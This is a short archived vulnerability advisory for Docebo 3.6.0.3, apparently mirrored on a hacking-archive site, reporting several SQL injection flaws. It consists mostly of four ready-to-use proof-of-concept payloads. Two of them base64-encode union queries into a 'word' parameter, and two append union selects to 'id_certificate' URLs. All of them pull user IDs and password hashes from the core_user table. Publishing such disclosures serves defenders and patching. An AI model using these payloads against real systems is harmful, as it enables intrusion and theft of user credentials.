AOH :: HP Unsorted D :: BT-21790.HTM

Docebo Multiple SQL-Injection Vulnerabilities



Docebo Multiple SQL-Injection Vulnerabilities
Docebo Multiple SQL-Injection Vulnerabilities



**************************************************************
Application: Docebo
Version affected: 3.6.0.3
Website: http://www.docebo.com 
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com 
Web: http://www.andreafabrizi.it 
Vuln: Multiple SQL-Injection Vulnerabilities
**************************************************************

########## EXAMPLE 1 ##########
roland@hp6720s:~$ echo -n "' union select userid,pass from core_user
-- " | base64
JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g

-> http://localhost/docebo/doceboLms/index.php?modname=faq&op=play&mode=help&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g 
###############################

########## EXAMPLE 2 ##########
roland@hp6720s:~$ echo -n "' union select 1,userid,pass from core_user
-- " | base64
JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA
-> http://localhost/docebo/doceboLms/index.php?modname=link&op=play&mode=keyw&word=JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA############################### 

########## EXAMPLE 3 ##########
-> http://localhost/docebo/doceboCore/index.php?modname=meta_certificate&op=elemmetacertificate&id_certificate=3222 
union select concat (userid,0x3d,pass),2,3 from core_user limit 1,2
###############################

########## EXAMPLE 4 ##########
-> http://localhost/docebo/doceboCore/index.php?modname=certificate&op=elemcertificate&id_certificate=1123 
union select concat(userid,0x3d,pass),2,3 from core_user limit 1,2
###############################

--
Andrea Fabrizi
http://www.andreafabrizi.it 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.